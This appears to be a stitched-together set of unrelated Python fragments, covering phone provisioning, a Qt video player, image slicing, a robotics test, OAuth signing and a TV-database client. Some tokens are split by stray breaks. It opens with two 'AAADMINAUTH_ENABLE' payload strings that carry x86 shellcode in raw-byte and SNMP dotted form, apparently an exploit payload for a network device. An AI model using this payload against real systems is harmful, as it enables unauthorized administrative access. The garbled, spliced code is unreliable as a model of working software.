payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x | 00\x | 00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80"
payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128"
|
self.http_service = HTTPNoListingFileService(self._tftpboot_dir)
http_dev_info_extractor = BaseSnomHTTPDeviceInfoExtractor()
def _common_templates(self):
yield ('common/gui_lang.xml.tpl', 'gui_lang.xml')
yield ('common/web_lang.xml.tpl', 'web_lang.xml')
for tpl_format, file_format in [('common/snom%s.htm.tpl', 'snom%s.htm'),
('common/snom%s.xml.tpl', 'snom%s.xml'),
('common/snom%s-firmware.xml.tpl', 'snom%s-firmware.xml')]:
for model in self._MODELS:
yield tpl_format % model, file_format % model
    def configure_common(self, raw_config):
        """Render every common template into the TFTP root directory."""
        for tpl_filename, filename in self._common_templates():
            tpl = self._tpl_helper.get_template(tpl_filename)
            dst = os.path.join(self._tftpboot_dir, filename)
            self._tpl_helper.dump(tpl, raw_config, dst, self._ENCODING)
def _update_sip_lines(self, raw_config):
proxy_ip = raw_config.get(u'sip_proxy_ip')
backup_proxy_ip = raw_config.get(u'sip_backup_proxy_ip')
voicemail = raw_config.get(u'exten_voicemail')
for line in raw_config[u'sip_lines'].itervalues():
if proxy_ip:
line.setdefault(u'proxy_ip', proxy_ip)
if backup_proxy_ip:
line.setdefault(u'backup_proxy_ip', backup_proxy_ip)
if voicemail:
line.setdefault(u'voicemail', voicemail)
def _get_fkey_domain(self, raw_config):
# Return None if there's no usable domain
if u'sip_proxy_ip' in raw_config:
return raw_config[u'sip_proxy_ip']
else:
lines = raw_config[u'sip_lines']
if lines:
return lines[min(lines.iterkeys())][u'proxy_ip']
return None
    def _add_fkeys(self, raw_config, model):
        """Render raw_config[u'funckeys'] into <fkey> XML lines (XX_fkeys)."""
        domain = self._get_fkey_domain(raw_config)
        if domain is None:
            if raw_config[u'funckeys']:
                logger.warning('Could not set funckeys: no domain part')
        else:
            lines = []
            # Keys are processed in funckey-number order.
            for funckey_no, funckey_dict in sorted(raw_config[u'funckeys'].iteritems(),
                                                   key=itemgetter(0)):
                funckey_type = funckey_dict[u'type']
                if funckey_type == u'speeddial':
                    type_ = u'speed'
                    suffix = ''
                elif funckey_type == u'park':
                    # Only these models get the dedicated park-orbit key type;
                    # others fall back to a plain speed dial.
                    if model in ['710', '720', '715', '760']:
                        type_ = u'orbit'
                        suffix = ''
                    else:
                        type_ = u'speed'
                        suffix = ''
                elif funckey_type == u'blf':
                    if u'exten_pickup_call' in raw_config:
                        type_ = u'blf'
                        suffix = '|%s' % raw_config[u'exten_pickup_call']
                    else:
                        logger.warning('Could not set funckey %s: no exten_pickup_call',
                                       funckey_no)
                        continue
                else:
                    logger.info('Unsupported funckey type: %s', funckey_type)
                    continue
                value = funckey_dict[u'value']
                label = escape(funckey_dict.get(u'label', value))
                fkey_value = self._format_fkey_value(type_, value, domain, suffix)
                # fkey indexes are zero-based on the phone side.
                lines.append(u'<fkey idx="%d" label="%s" context="active" perm="R">%s</fkey>' %
                             (int(funckey_no) - 1, label, fkey_value))
            raw_config[u'XX_fkeys'] = u'\n'.join(lines)
def _format_fkey_value(self, fkey_type, value, domain, suffix):
return '%s <sip:%s@%s>%s' % (fkey_type, value, domain, suffix)
def _add_lang(self, raw_config):
if u'locale' in raw_config:
locale = raw_config[u'locale']
if locale in self._LOCALE:
raw_config[u'XX_lang'] = self._LOCALE[locale]
def _format_dst_change(self, dst_change):
fmted_time = u'%02d:%02d:%02d' % tuple(dst_change['time'].as_hms)
day = dst_change['day']
if day.startswith('D'):
return u'%02d.%02d %s' % (int(day[1:]), dst_change['month'], fmted_time)
else:
week, weekday = map(int, day[1:].split('.'))
weekday = tzinform.week_start_on_monday(weekday)
return u'%02d.%02d.%02d %s' % (dst_change['month'], week, weekday, fmted_time)
def _format_tzinfo(self, tzinfo):
lines = []
lines.append(u'<timezone perm="R"></timezone>')
lines.append(u'<utc_offset perm="R">%+d</utc_offset>' % tzinfo['utcoffset'].as_seconds)
if tzinfo['dst'] is None:
lines.append(u'<dst perm="R"></dst>')
else:
lines.append(u'<dst perm="R">%d %s %s</dst>' %
(tzinfo['dst']['save'].as_seconds,
self._format_dst_change(tzinfo['dst']['start']),
self._format_dst_change(tzinfo['dst']['end'])))
return u'\n'.join(lines)
    def _add_timezone(self, raw_config):
        """Set XX_timezone from raw_config[u'timezone'] when it resolves."""
        if u'timezone' in raw_config:
            try:
                tzinfo = tzinform.get_timezone_info(raw_config[u'timezone'])
            except tzinform.TimezoneNotFoundError, e:
                # Unknown zone: log and leave XX_timezone unset.
                logger.warning('Unknown timezone %s: %s', raw_config[u'timezone'], e)
            else:
                raw_config[u'XX_timezone'] = self._format_tzinfo(tzinfo)
def _add_user_dtmf_info(self, raw_config):
dtmf_mode = raw_config.get(u'sip_dtmf_mode')
for line in raw_config[u'sip_lines'].itervalues():
cur_dtmf_mode = line.get(u'dtmf_mode', dtmf_mode)
line[u'XX_user_dtmf_info'] = self._SIP_DTMF_MODE.get(cur_dtmf_mode, u'off')
def _add_msgs_blocked(self, raw_config):
msgs_blocked = ''
for line_no, line in raw_config[u'sip_lines'].iteritems():
if line.get('backup_proxy_ip'):
backup_line_no = int(line_no) + 1
msgs_blocked += ' Identity%02dIsNotRegistered' % backup_line_no
raw_config['XX_msgs_blocked'] = msgs_blocked
def _gen_xx_dict(self, raw_config):
xx_dict = self._XX_DICT[self._XX_DICT_DEF]
if u'locale' in raw_config:
locale = raw_config[u'locale']
lang = locale.split('_', 1)[0]
if lang in self._XX_DICT:
xx_dict = self._XX_DICT[lang]
return xx_dict
def _dev_specific_filenames(self, device):
# Return a tuple (htm filename, xml filename)
fmted_mac = format_mac(device[u'mac'], separator='', uppercase=True)
return 'snom%s-%s.htm' % (devic | e[u'model'], fmted_mac), fmted_mac + '.xml'
def _check_config(self, raw_config):
if u'http_port' not in raw_config:
raise RawConfigError('only support configuration via HTTP')
def _check_device(self, device):
if u'mac' not in device:
raise Exception('MAC address needed for device configuration')
# model | is needed since filename has model name in it.
if u'model' not in device:
raise Exception('model needed for device configuration')
def configure(self, device, raw_config):
self._check_config(raw_config)
self._check_device(device)
htm_filename, xml_filename = self._dev_specific_filenames(device)
# generate xml file
tpl = self._tpl_helper.get_dev_template(xml_filename, device)
model = device.get(u'model')
self._update_sip_lines(raw_config)
self._add_fkeys(raw_config, model)
self._add_lang(raw_config)
self._add_timezone(raw_config)
self._add_user_dtmf_info(raw_config)
self._add_msgs_blocked(raw_config)
raw_config[u'XX_dict'] = self._gen_xx_dict(raw_config)
raw_config[u'XX_options'] = device.get(u'options', {})
path = os.path.join(self._tftpboot_dir, xml_filename)
self._tpl_helper.dump(tpl, raw_config, path, self._ENCODING)
# generate htm file
tpl = s |
lambda x: x
    def __setitem__(self, key, value):
        # No-op stand-in for MPV property assignment (e.g. player["pause"]).
        return
    def __getitem__(self, key):
        # Stand-in for MPV property reads; always yields None.
        return
    def play(self, *args, **kwargs):
        # No-op: mpv is unavailable.
        pass
    def seek(self, *args, **kwargs):
        # No-op: mpv is unavailable.
        pass
    def frame_step(self, *args, **kwargs):
        # No-op: mpv is unavailable.
        pass
    def frame_back_step(self, *args, **kwargs):
        # No-op: mpv is unavailable.
        pass
class VideoPlayer(QWidget):
    def __init__(self, parent=None, pixlib=None):
        """Build the player widget: mpv (or dummy) backend, timecode
        displays, timeline slider, region bar and navigation bar."""
        super(VideoPlayer, self).__init__(parent)
        self.pixlib = pixlib
        self.markers = {}
        self.video_window = QWidget(self)
        self.video_window.setStyleSheet("background-color: #161616;")
        if not has_mpv:
            self.player = DummyPlayer()
        else:
            try:
                self.player = MPV(
                    keep_open=True, wid=str(int(self.video_window.winId()))
                )
            except Exception:
                # Fall back to the no-op player when mpv cannot be embedded.
                log_traceback(handlers=False)
                self.player = DummyPlayer()
        # Playback / selection state (times in seconds; fps assumed 25
        # until the loaded media says otherwise).
        self.position = 0
        self.duration = 0
        self.mark_in = 0
        self.mark_out = 0
        self.fps = 25.0
        self.loaded = False
        self.duration_changed = False
        # prev_* mirror the last values pushed to the displays (see
        # on_display_timer) so widgets are only updated on change.
        self.prev_position = 0
        self.prev_duration = 0
        self.prev_mark_in = 0
        self.prev_mark_out = 0
        #
        # Displays
        #
        self.mark_in_display = TimecodeWindow(self)
        self.mark_in_display.setToolTip("Selection start")
        self.mark_in_display.returnPressed.connect(
            functools.partial(self.on_mark_in, self.mark_in_display)
        )
        self.mark_out_display = TimecodeWindow(self)
        self.mark_out_display.setToolTip("Selection end")
        self.mark_out_display.returnPressed.connect(
            functools.partial(self.on_mark_out, self.mark_out_display)
        )
        self.io_display = TimecodeWindow(self)
        self.io_display.setToolTip("Selection duration")
        self.io_display.setReadOnly(True)
        self.position_display = TimecodeWindow(self)
        self.position_display.setToolTip("Clip position")
        self.position_display.returnPressed.connect(
            functools.partial(self.seek, self.position_display)
        )
        self.duration_display = TimecodeWindow(self)
        self.duration_display.setToolTip("Clip duration")
        self.duration_display.setReadOnly(True)
        #
        # Controls
        #
        self.timeline = QSlider(Qt.Horizontal)
        self.timeline.setRange(0, 0)
        self.timeline.sliderMoved.connect(self.on_timeline_seek)
        self.region_bar = RegionBar(self)
        self.navbar = get_navbar(self)
        #
        # Layout
        #
        bottom_bar = QHBoxLayout()
        top_bar = QHBoxLayout()
        top_bar.addWidget(self.mark_in_display, 0)
        top_bar.addStretch(1)
        top_bar.addWidget(self.io_display, 0)
        top_bar.addStretch(1)
        top_bar.addWidget(self.mark_out_display, 0)
        bottom_bar.addWidget(self.position_display, 0)
        bottom_bar.addWidget(self.navbar, 1)
        bottom_bar.addWidget(self.duration_display, 0)
        layout = QVBoxLayout()
        layout.addLayout(top_bar)
        layout.addWidget(self.video_window)
        layout.addWidget(self.region_bar)
        layout.addWidget(self.timeline)
        layout.addLayout(bottom_bar)
        self.setLayout(layout)
        self.navbar.setFocus(True)

        # mpv property observers feed playback state back into the widget.
        @self.player.property_observer("time-pos")
        def time_observer(_name, value):
            self.on_time_change(value)

        @self.player.property_observer("duration")
        def duration_observer(_name, value):
            self.on_duration_change(value)

        @self.player.property_observer("pause")
        def pause_observer(_name, value):
            self.on_pause_change(value)

        # Displays updater (refresh every 40 ms)
        self.display_timer = QTimer()
        self.display_timer.timeout.connect(self.on_display_timer)
        self.display_timer.start(40)
    @property
    def frame_dur(self):
        # Duration of a single frame in seconds (assumes constant self.fps).
        return 1 / self.fps
def load(self, path, mark_in=0, mark_out=0, markers={}):
self.loaded = False
self.markers = markers
self.player["pause"] = True
self.player.play(path)
self.prev_mark_in = -1
self.prev_mark_out = -1
self.mark_in = mark_in
self.mark_out = mark_out
self.mark_in_display.set_value(0)
self.mark_out_display.set_value(0)
self.duration_display.set_value(0)
self.position_display.set_value(0)
    def on_time_change(self, value):
        # mpv "time-pos" observer: track the current playhead position.
        self.position = value
def on_duration_change(self, value):
if value:
self.duration = value
self.loaded = True
else:
self.duration = 0
self.loaded = False
self.duration_changed = True
self.region_bar.update()
    def on_pause_change(self, value):
        # mpv "pause" observer: swap the play/pause toolbar icon.
        # NOTE(review): assumes `value` is a bool (indexes 0/1) — confirm.
        if hasattr(self, "action_play"):
            self.action_play.setIcon(QIcon(self.pixlib[["pause", "play"][int(value)]]))
    def on_timeline_seek(self):
        # Pause and seek to the slider position (slider units: 1/100 s).
        if not self.loaded:
            return
        try:
            self.player["pause"] = True
            self.player.seek(self.timeline.value() / 100.0, "absolute", "exact")
        except Exception:
            # Best-effort: mpv may refuse to seek (e.g. stream not seekable).
            pass
def on_frame_next(self):
if not self.loaded:
return
self.player.frame_step()
def on_frame_prev(self):
if not self.loaded:
return
self.player.frame_back_step()
def on_5_next(self):
if not self.loaded:
return
self.player.seek(5 * self.frame_dur, "relative", "exact")
def on_5_prev(self):
if not self.loaded:
return
self.player.seek(-5 * self.frame_dur, "relative", "exact")
def on_go_start(self):
if not self.loaded:
return
self.player.seek(0, "absolute", "exact")
def on_go_end(self):
if not self.loaded:
return
self.player.seek(self.duration, "absolute", "exact")
def on_go_in(self):
if not self.loaded:
return
self.seek(self.mark_in)
def on_go_out(self):
if not self.loaded:
return
self.seek(self.mark_out or self.duration)
def on_mark_in(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_in = value
self.setFocus()
else:
self.mark_in = self.position
self.region_bar.update()
def on_mark_out(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_out = value
self.setFocus()
else:
self.mark_out = self.position
self.region_bar.update()
def on_clear_in(self):
if not self.loaded:
return
self.mark_in = 0
self.region_bar.update()
def on_clear_out(self):
if not self.loaded:
return
self.mark_out = 0
self.region_bar.update()
def on_clear_marks(self):
if not self.loaded:
return
self.mark_out = self.mark_in = 0
self.region_bar.update()
def seek(self, position):
if not self.loaded:
return
if isinstanc | e(position, TimecodeWindow):
position = position.get_value()
self.setFocus()
self.player.seek(position, "absolute", "exact")
def on_pause(self):
if not self.loaded:
return
self.player["pause"] = not self.player["pause"]
def force_pause(self):
| if not self.loaded:
return
if not self.player["pause"]:
self.player["pause"] = True
def update_marks(self):
i = self.mark_in
o = self.mark_out or self.duration
self.mark_in_displ |
## image quickie!
## install PIL (Python Imaging Library) first. Supercool lib
## NOTE: this is a Python 2 script (print statements, integer division).
import Image ## from Pil !
# Source image to slice apart.
fImageOrig = "C:\\evil1.jpg"
im = Image.open(fImageOrig)
print im.size, im.mode
width, height = im.size
## get pixel list (flat, row-major)
lpix = list(im.getdata())
def getEvenOdd(lpix, width, height):
    """Pick pixels starting at column 0 in the top row band."""
    return getPixels(lpix, width, height, baseoffset=0)
def getOddEven(lpix, width, height):
    """Pick pixels starting at column 1 in the top row band."""
    return getPixels(lpix, width, height, baseoffset=1)
def getPixels(lpix, width, height, baseoffset):
    """Take every second pixel of each row from the flat pixel list.

    Rows are grouped in bands of six: rows 0-2 start at `baseoffset`,
    rows 3-5 start at the flipped offset (1 - baseoffset), and so on.
    """
    picked = []
    for row in range(height):
        col0 = baseoffset
        if row % 6 in (3, 4, 5):
            col0 = 1 - baseoffset
        start = row * width + col0
        picked.extend(lpix[start : start + width : 2])
    return picked
|
##l0 = getEvenOdd(lpix, width, height)
##l1 = getOddEven(lpix, width, height)
# Simple even/odd split over the whole flat pixel list.
l0 = lpix[::2]
l1 = lpix[1::2]
# width/2 relies on Python 2 integer division.
im0 = Image.new(im.mode, (width/2, height))
im0.putdata(l0)
im0.save("c:\\ev0.jpg")
im1 = Image.new(im.mode, (width/2, height))
im1.putdata(l1)
im1.save("c:\\ev1.jpg")
def getAnXthPartHeight(lpix, width, height, startline, x=6):
    """Collect every x-th row of the image, starting at row `startline`."""
    l = []
    print width, height, startline
    for i in range(startline, height, x):
        l.extend(lpix[i*width : (i+1)*width])
    return l
def getAnXthPartWidth(lpix, width, height, startcol, x=8):
    """Collect every x-th pixel of a flat pixel list, starting at index
    `startcol` (effectively every x-th column for row-major data)."""
    # Debug trace (Python 2 print statement).
    print width, height, startcol
    return lpix[startcol::x]
# Slice each half-image into `magicheight` row-interleaved sub-images.
magicheight = 5
# Python 2 idiom: range() returns a list, used here as a pre-sized
# placeholder that is then filled by index.
listsEven = range(magicheight)
imagesEven = range(magicheight)
for i in range(magicheight):
    listsEven[i] = getAnXthPartHeight(l0, width/2, height, i, magicheight)
    imagesEven[i] = Image.new(im.mode, (width/2, height/magicheight))
    imagesEven[i].putdata(listsEven[i])
    imagesEven[i].save("c:\\evil_even_" + str(magicheight) + "_" + str(i) + ".jpg")
listsOdd = range(magicheight)
imagesOdd = range(magicheight)
for i in range(magicheight):
    listsOdd[i] = getAnXthPartHeight(l1, width/2, height, i, magicheight)
    imagesOdd[i] = Image.new(im.mode, (width/2, height/magicheight))
    imagesOdd[i].putdata(listsOdd[i])
    imagesOdd[i].save("c:\\evil_odd_" + str(magicheight) + "_" + str(i) + ".jpg")
# Further slice each row-band into `magicwidth` column-interleaved
# sub-images, one file per (band j, column phase i) pair.
magicwidth = 4
for j in range(magicheight):
    listsEvenJ = range(magicwidth)
    imagesEvenJ = range(magicwidth)
    for i in range(magicwidth):
        listsEvenJ[i] = getAnXthPartWidth(listsEven[j], width/2, height, i, magicwidth)
        imagesEvenJ[i] = Image.new(im.mode, ((width/2)/magicwidth, height/magicheight))
        imagesEvenJ[i].putdata(listsEvenJ[i])
        imagesEvenJ[i].save("c:\\evil_even_" + str(magicheight) + "_" + \
                            str(magicwidth) + "_" + str(i) + "_" + str(j) + ".jpg")
for j in range(magicheight):
    listsOddJ = range(magicwidth)
    imagesOddJ = range(magicwidth)
    for i in range(magicwidth):
        listsOddJ[i] = getAnXthPartWidth(listsOdd[j], width/2, height, i, magicwidth)
        imagesOddJ[i] = Image.new(im.mode, ((width/2)/magicwidth, height/magicheight))
        imagesOddJ[i].putdata(listsOddJ[i])
        imagesOddJ[i].save("c:\\evil_odd_" + str(magicheight) + "_" + \
                           str(magicwidth) + "_" + str(i) + "_" + str(j) + ".jpg")
|
"""
Module with Qt widg | ets.
"""
from .debug_info import DebugPanelWidget
from .error_tab import ErrorWidget
from .info_panel import InfoPanelPage
from .tree import TreeWidget
from .yaml_editor import YamlEd | itorWidget
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE A | RE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIM | ITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: William Baker
#
# This test is used to ensure planning with a MoveGroupInterface is
# possible if the robot's move_group node is in a different namespace
import unittest
import numpy as np
import rospy
import rostest
import os
from moveit_ros_planning_interface._moveit_move_group_interface import MoveGroupInterface
class PythonMoveGroupNsTest(unittest.TestCase):
    """Exercise MoveGroupInterface when move_group lives in a namespace."""
    PLANNING_GROUP = "manipulator"
    # Namespace prefix under which the move_group node runs.
    PLANNING_NS = "test_ns/"
    # NOTE(review): the classmethods below name their first argument
    # `self` instead of `cls`, and `tearDown` (normally an instance
    # method) is declared as a classmethod — both work but are unusual.
    @classmethod
    def setUpClass(self):
        # One shared interface for all tests, resolved inside PLANNING_NS.
        self.group = MoveGroupInterface(self.PLANNING_GROUP, "%srobot_description"%self.PLANNING_NS, self.PLANNING_NS)
    @classmethod
    def tearDown(self):
        pass
    def check_target_setting(self, expect, *args):
        # With no extra args, `expect` itself is the value to set.
        if len(args) == 0:
            args = [expect]
        self.group.set_joint_value_target(*args)
        res = self.group.get_joint_value_target()
        self.assertTrue(np.all(np.asarray(res) == np.asarray(expect)),
                        "Setting failed for %s, values: %s" % (type(args[0]), res))
    def test_target_setting(self):
        # The same target must be settable from list, tuple, ndarray,
        # dict-by-joint-name, and (joint_name, value) forms.
        n = self.group.get_variable_count()
        self.check_target_setting([0.1] * n)
        self.check_target_setting((0.2,) * n)
        self.check_target_setting(np.zeros(n))
        self.check_target_setting([0.3] * n, {name: 0.3 for name in self.group.get_active_joints()})
        self.check_target_setting([0.5] + [0.3]*(n-1), "joint_1", 0.5)
    def plan(self, target):
        self.group.set_joint_value_target(target)
        return self.group.compute_plan()
    def test_validation(self):
        current = np.asarray(self.group.get_current_joint_values())
        plan1 = self.plan(current + 0.2)
        plan2 = self.plan(current + 0.2)
        # first plan should execute
        self.assertTrue(self.group.execute(plan1))
        # second plan should be invalid now (due to modified start point) and rejected
        self.assertFalse(self.group.execute(plan2))
        # newly planned trajectory should execute again
        plan3 = self.plan(current)
        self.assertTrue(self.group.execute(plan3))
if __name__ == '__main__':
    # Run the suite under rostest so it integrates with the ROS test
    # infrastructure (requires a running ROS master).
    PKGNAME = 'moveit_ros_planning_interface'
    NODENAME = 'moveit_test_python_move_group'
    rospy.init_node(NODENAME)
    rostest.rosrun(PKGNAME, NODENAME, PythonMoveGroupNsTest)
|
params)
normalized_uri = signature.normalize_base_string_uri(request.uri)
logging.debug("Normalized params: {0}".format(normalized_params))
logging.debug("Normalized URI: {0}".format(normalized_uri))
base_string = signature.construct_base_string(request.http_method,
normalized_uri, normalized_params)
logging.debug("Base signing string: {0}".format(base_string))
if self.signature_method == SIGNATURE_HMAC:
sig = signature.sign_hmac_sha1(base_string, self.client_secret,
self.resource_owner_secret)
elif self.signature_method == SIGNATURE_RSA:
sig = signature.sign_rsa_sha1(base_string, self.rsa_key)
else:
sig = signature.sign_plaintext(self.client_secret,
self.resource_owner_secret)
logging.debug("Signature: {0}".format(sig))
return sig
def get_oauth_params(self):
"""Get the basic OAuth parameters to be used in generating a signature.
"""
nonce = (generate_nonce()
if self.nonce is None else self.nonce)
timestamp = (generate_timestamp()
if self.timestamp is None else self.timestamp)
params = [
('oauth_nonce', nonce),
('oauth_timestamp', timestamp),
('oauth_version', '1.0'),
('oauth_signature_method', self.signature_method),
('oauth_consumer_key', self.client_key),
]
if self.resource_owner_key:
params.append(('oauth_token', self.resource_owner_key))
if self.callback_uri:
params.append(('oauth_callback', self.callback_uri))
if self.verifier:
params.append(('oauth_verifier', self.verifier))
return params
def _render(self, request, formencode=False, realm=None):
"""Render a signed request according to signature type
Returns a 3-tuple containing the request URI, headers, and body.
If the formencode argument is True and the body contains parameters, it
is escaped and returned as a valid formencoded string.
"""
# TODO what if there are body params on a header-type auth?
# TODO what if there are query params on a body-type auth?
uri, headers, body = request.uri, request.headers, request.body
# TODO: right now these prepare_* methods are very narrow in scope--they
# only affect their little thing. In some cases (for example, with
# header auth) it might be advantageous to allow these methods to touch
# other parts of the request, like the headers—so the prepare_headers
# method could also set the Content-Type header to x-www-form-urlencoded
# like the spec requires. This would be a fundamental change though, and
# I'm not sure how I feel about it.
if self.signature_type == SIGNATURE_TYPE_AUTH_HEADER:
headers = parameters.prepare_headers(request.oauth_params, request.headers, realm=realm)
elif self.signature_type == SIGNATURE_TYPE_BODY and request.decoded_body is not None:
body = parameters.prepare_form_encoded_body(request.oauth_params, request.decoded_body)
if formencode:
body = urlencode(body)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
elif self.signature_type == SIGNATURE_TYPE_QUERY:
uri = parameters.prepare_request_uri_query(request.oauth_params, request.uri)
else:
raise ValueError('Unknown signature type specified.')
return uri, headers, body
    def sign(self, uri, http_method='GET', body=None, headers=None, realm=None):
        """Sign a request
        Signs an HTTP request with the specified parts.
        Returns a 3-tuple of the signed request's URI, headers, and body.
        Note that http_method is not returned as it is unaffected by the OAuth
        signing process.
        The body argument may be a dict, a list of 2-tuples, or a formencoded
        string. The Content-Type header must be 'application/x-www-form-urlencoded'
        if it is present.
        If the body argument is not one of the above, it will be returned
        verbatim as it is unaffected by the OAuth signing process. Attempting to
        sign a request with non-formencoded data using the OAuth body signature
        type is invalid and will raise an exception.
        If the body does contain parameters, it will be returned as a properly-
        formatted formencoded string.
        All string data MUST be unicode. This includes strings inside body
        dicts, for example.
        """
        # normalize request data
        request = Request(uri, http_method, body, headers,
                          encoding=self.encoding)
        # sanity check
        content_type = request.headers.get('Content-Type', None)
        multipart = content_type and content_type.startswith('multipart/')
        should_have_params = content_type == CONTENT_TYPE_FORM_URLENCODED
        has_params = request.decoded_body is not None
        # The checks below reject header/body combinations forbidden by
        # RFC 5849; each ValueError names the inconsistency found.
        # 3.4.1.3.1.  Parameter Sources
        # [Parameters are collected from the HTTP request entity-body, but only
        # if [...]:
        #    *  The entity-body is single-part.
        if multipart and has_params:
            raise ValueError("Headers indicate a multipart body but body contains parameters.")
        #    *  The entity-body follows the encoding requirements of the
        #       "application/x-www-form-urlencoded" content-type as defined by
        #       [W3C.REC-html40-19980424].
        elif should_have_params and not has_params:
            raise ValueError("Headers indicate a formencoded body but body was not decodable.")
        #    *  The HTTP request entity-header includes the "Content-Type"
        #       header field set to "application/x-www-form-urlencoded".
        elif not should_have_params and has_params:
            raise ValueError("Body contains parameters but Content-Type header was not set.")
        # 3.5.2.  Form-Encoded Body
        # Protocol parameters can be transmitted in the HTTP request entity-
        # body, but only if the following REQUIRED conditions are met:
        # o  The entity-body is single-part.
        # o  The entity-body follows the encoding requirements of the
        #    "application/x-www-form-urlencoded" content-type as defined by
        #    [W3C.REC-html40-19980424].
        # o  The HTTP request entity-header includes the "Content-Type" header
        #    field set to "application/x-www-form-urlencoded".
        elif self.signature_type == SIGNATURE_TYPE_BODY and not (
                should_have_params and has_params and not multipart):
            raise ValueError('Body signatures may only be used with form-urlencoded content')
        # generate the basic OAuth parameters
        request.oauth_params = self.get_oauth_params()
        # generate the signature; it must be appended last, computed over
        # all the other oauth parameters
        request.oauth_params.append(('oauth_signature', self.get_oauth_signature(request)))
        # render the signed request and return it
        return self._render(request, formencode=True,
                            realm=(realm or self.realm))
class Server(object):
"""A server base class used to verify OAuth 1.0 RFC 5849 requests
|
OAuth providers should inherit from Server and implement the methods
and properties outlined below. Further details are provided in the
documentation for each method and property.
Methods used to check the format of input parameters. Common tests include
length, character set, membership, range or pattern. These tests are
referred to as `whitelisting or blacklisting`_. Whitelisting is better
    but blacklisting can be useful to spot malicious activity.
    The following methods have a default implementation:
- check_client_key
- check_request_token
- check_access_token
- check_nonce
- check_verifier
- check_realm
The methods above default to whitelist input parameters, checking that they
are alphanumerical and between a minimum and maximum |
# -*- coding: utf-8 -*-
"""
This module implements the base class of tvdbsimple.
Handle automatically login, token creation and response basic stripping.
[See Authentication API section](https://api.thetvdb.com/swagger#!/Authentication)
"""
import json
import requests
class AuthenticationError(Exception):
    """
    Raised when authentication against the TVDB API fails
    (bad API key, username or user-key).
    """
    pass
class APIKeyError(Exception):
    """
    Raised when no API key has been configured before making a request.
    """
    pass
class TVDB(object):
    """
    Basic Authentication class for API key, login and token automatic handling functionality.
    [See Authentication API section](https://api.thetvdb.com/swagger#!/Authentication)
    """
    # Default headers sent with every request; Accept-Language may be
    # added later via _set_language(). Note these are class-level and
    # therefore shared by all instances.
    _headers = {'Content-Type': 'application/json',
                'Accept': 'application/json',
                'Connection': 'close'}
    _BASE_PATH = ''
    _URLS = {}
    _BASE_URI = 'https://api.thetvdb.com'
    def __init__(self, id=0, user=None, key=None):
        """
        Initialize the base class.
        You can provide `id` that is the item id used for url creation. You can also
        provide `user`, that is the username for login.
        You can also provide `key`, that is the userkey needed to
        authenticate with the user, you can find it in the
        [account info](http://thetvdb.com/?tab=userinfo) under account identifier.
        """
        self._ID = id
        # Username for login, if available.
        self.USER = user
        # User-key for login, if available.
        self.USER_KEY = key
    def _get_path(self, key):
        """Return the relative API path registered under `key`."""
        return self._BASE_PATH + self._URLS[key]
    def _get_id_path(self, key):
        """Return the API path for `key` with this instance's id substituted."""
        return self._get_path(key).format(id=self._ID)
    def _get_complete_url(self, path):
        """Join `path` onto the API base URI."""
        return '{base_uri}/{path}'.format(base_uri=self._BASE_URI, path=path)
    def _set_language(self, language):
        """Set the Accept-Language request header when `language` is truthy."""
        if language:
            self._headers['Accept-Language'] = language
    def refresh_token(self):
        """
        Refresh the current token set in the module.
        Returns the new obtained valid token for the API, or '' if the
        response carried no token.
        """
        self._set_token_header()
        response = requests.request(
            'GET', self._get_complete_url('refresh_token'),
            headers=self._headers)
        response.raise_for_status()
        jsn = response.json()
        if 'token' in jsn:
            from . import KEYS
            KEYS.API_TOKEN = jsn['token']
            return KEYS.API_TOKEN
        return ''
    def _set_token_header(self, forceNew=False):
        """Attach the Bearer token to the shared request headers."""
        self._headers['Authorization'] = 'Bearer ' + self.get_token(forceNew)
    def get_token(self, forceNew=False):
        """
        Get the existing token or create it if it doesn't exist.
        Returns the API token.
        If `forceNew` is true the function will do a new login to retrieve the token.
        Raises APIKeyError when no API key is configured and
        AuthenticationError when the login request is rejected.
        """
